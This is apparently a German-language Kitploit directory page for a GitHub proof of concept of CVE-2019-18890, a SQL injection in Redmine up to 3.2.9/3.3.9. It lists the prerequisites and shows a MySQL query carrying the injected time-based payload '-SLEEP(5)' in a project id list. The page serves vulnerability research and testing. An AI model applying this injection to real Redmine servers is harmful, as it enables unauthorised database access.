Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-18890 — CVE-2019-18890 POC (Proof of Concept) | Kitploit
Tools/GitHubGitHub/reallinkers/cve-2019-18890
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubreallinkers/cve-2019-18890

CVE-2019-18890

CVE-2019-18890 POC (Proof of Concept)

Repository anzeigen
1022vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-18890

CVE-2019-18890 POC (Proof of Concept)

REDMINE BIS 3.2.9/3.3.9 SQL-INJEKTION

https://nvd.nist.gov/vuln/detail/CVE-2019-18890

Anforderungen:

  • Zugangsdaten
  • Unterprojekt erforderlich
  • REST-API aktiviert

In MySQL sieht die erste Abfrage, bei der die Injection auftritt, wie das folgende Beispiel aus, wobei "-SLEEP(5)" der injizierte Teil ist:
SELECT COUNT(*) FROM issues INNER JOIN projects ON projects.id = issues.project_id INNER JOIN issue_statuses ON issue_statuses.id = issues.status_id WHERE (((projects.status <> 9 AND EXISTS (SELECT 1 AS one FROM enabled_modules em WHERE em.project_id = projects.id AND em.name='issue_tracking')) AND (((projects.is_public = 1 AND projects.id NOT IN (SELECT project_id FROM members WHERE user_id IN (4,2))) AND ((issues.is_private = 0)))))) AND ((issues.status_id IN (SELECT id FROM issue_statuses WHERE is_closed=0)) AND projects.id IN (1,2,3-SLEEP(5)))

Tool herunterladen